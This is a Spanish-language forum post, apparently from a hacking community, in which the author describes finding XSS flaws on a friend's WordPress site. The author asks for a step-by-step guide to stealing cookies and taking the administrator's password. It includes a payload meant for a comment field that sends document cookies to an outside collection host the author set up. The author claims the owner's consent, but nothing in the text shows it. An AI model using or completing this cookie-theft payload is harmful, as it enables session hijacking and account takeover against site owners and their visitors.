Buenos dias , gente de hackispano, e venido por aca ya que en otras comundades la verdad no me an ayudado ! =( y necesito ayuda ! BUENO AQUI LE SPONGO MIS DUDAS !
Bueno , pues ya logre un gran avanze en lo que corresponde a inyecciones xxs ( crosse site scripting ) y inyecciones html , Bueno ahroa tengo una duda . Tengo la pagina de un amigo por ejemplo crashh.me/wordspress y e logrado encontrar varias vulberabilidades xxs principalmente *, ahi subo algunas fotos
Pues logre hacer los tres ataques xxs , por lo que se que la pagina es vulnerable verdad , aunque la pregunta ahora seria que hacer verdad ! =)
" posdata : El dueño de la pagina es mi amigo , asi que no quiero hacerle ningun daño , a la pagina es tan solo algo como personal que tenemos entre el yo yo ! =) " asi que por eso no se preocupen , es tan solo *por diversion y para mostrarle que se puede ! "
BUENO SIGAMOS *
Pues , estaba leyendo y lo que debo hacer ahora es instalar *UN CODIGO SCRIPT COMO ESTE
para robar las cookies y asi poder , sacar la pass del administrador verdad ! La foto me quedo un poco mal , pero creo se pueda entender !
--------------------------------------------------------------------------
Pues como ya les habia mensionado haber si alguien me ayuda con una guia paso a paso de como robar LOS COOKIES , en una pagina web vulnerable a xss ! Si alguien me quisiera ayudar , pues bienvenido sea ! Un saludo y desde ya gracias !.
Bueno pues tampoco soy tan comodo de venir a pedir sin antes almenos haber leido ! =)
Bueno pues , lo de robar cookies por xss , lo se todo en teoria ! Osea en una pagina , que es vulnerable a xss y los comentarios estan habilitados .
Primero deberia crearme un dominio web en el cual se enviarian las cookies verdad ! BUENO YA LO HIZE Y ES ESTE
y ahi deberia pone en un coment de la pagina este codigo
javascript:void(document.location="http://hackedbyjustinxzibit.t35.com/cookie.php?c="+document.cookies)
para que envie las cookies a la direccin mencionada !
AQUI ES LA PARTE QUE NO ENTIENDO!... , SI ESTA BIEN ESE SCRITP Y DEBE SER COLOCADO EN LOS COMENTARIOS ! Y SI EN EL DOMIINIO WEB CREADO SE DEBE CREAR UN DIRECTORIO . O UN ARCHIVO CON UN NUEVO CODIGO , PUES AHI STA TODO , sI ALGUIEN ME QUIERE AYUDAR , LE AGRADECERIA UN MONTON LA VERDAD ! un saludo a toda la comunidad !
Marcadores